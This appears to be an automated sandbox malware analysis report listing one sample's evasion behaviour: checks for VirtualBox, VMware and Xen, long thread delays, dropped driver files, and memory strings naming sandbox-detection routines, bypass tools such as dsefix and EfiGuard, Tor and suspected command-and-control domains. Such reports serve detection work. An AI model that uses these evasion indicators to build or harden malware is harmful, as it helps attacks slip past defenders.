                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Query firmware table information (likely to detect VMs)
                        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES
                        Source: C:\Users\user\Desktop\25C1.exeMemory allocated: 1750000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeMemory allocated: 61A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeMemory allocated: 71A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeFile opened / queried: VBoxGuest
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeFile opened / queried: VBoxTrayIPC
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeFile opened / queried: \pipe\VBoxTrayIPC
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeFile opened / queried: VBoxMiniRdrDN
                        Source: C:\Users\user\Desktop\25C1.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7551Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1801Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8290
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1231
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6779
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2675
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7838
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1359
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeDropped PE file which has not been started: C:\Windows\Temp\gbfbijmbpkdw.sysJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\INetC.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeAPI coverage: 3.2 %
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeAPI coverage: 3.2 %
                        Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
                        Source: C:\Users\user\Desktop\25C1.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe TID: 7744Thread sleep time: -31000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep count: 7551 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep count: 1801 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep count: 6779 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep count: 2675 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\explorer.exe TID: 3124Thread sleep count: 85 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C63
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_004068B4 FindFirstFileW,FindClose,3_2_004068B4
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00402910 FindFirstFileW,3_2_00402910
                        Source: C:\Users\user\Desktop\25C1.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: BroomSetup.exe, 00000005.00000002.3821713066.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: ameNewaPINGPOSTPathQEMUROOTH
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: popcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: 11VBoxSFWINDIRWD
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: pclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: sse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BE
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: aryvmcixn-SR-%W
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: main.isRunningInsideVMWare
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
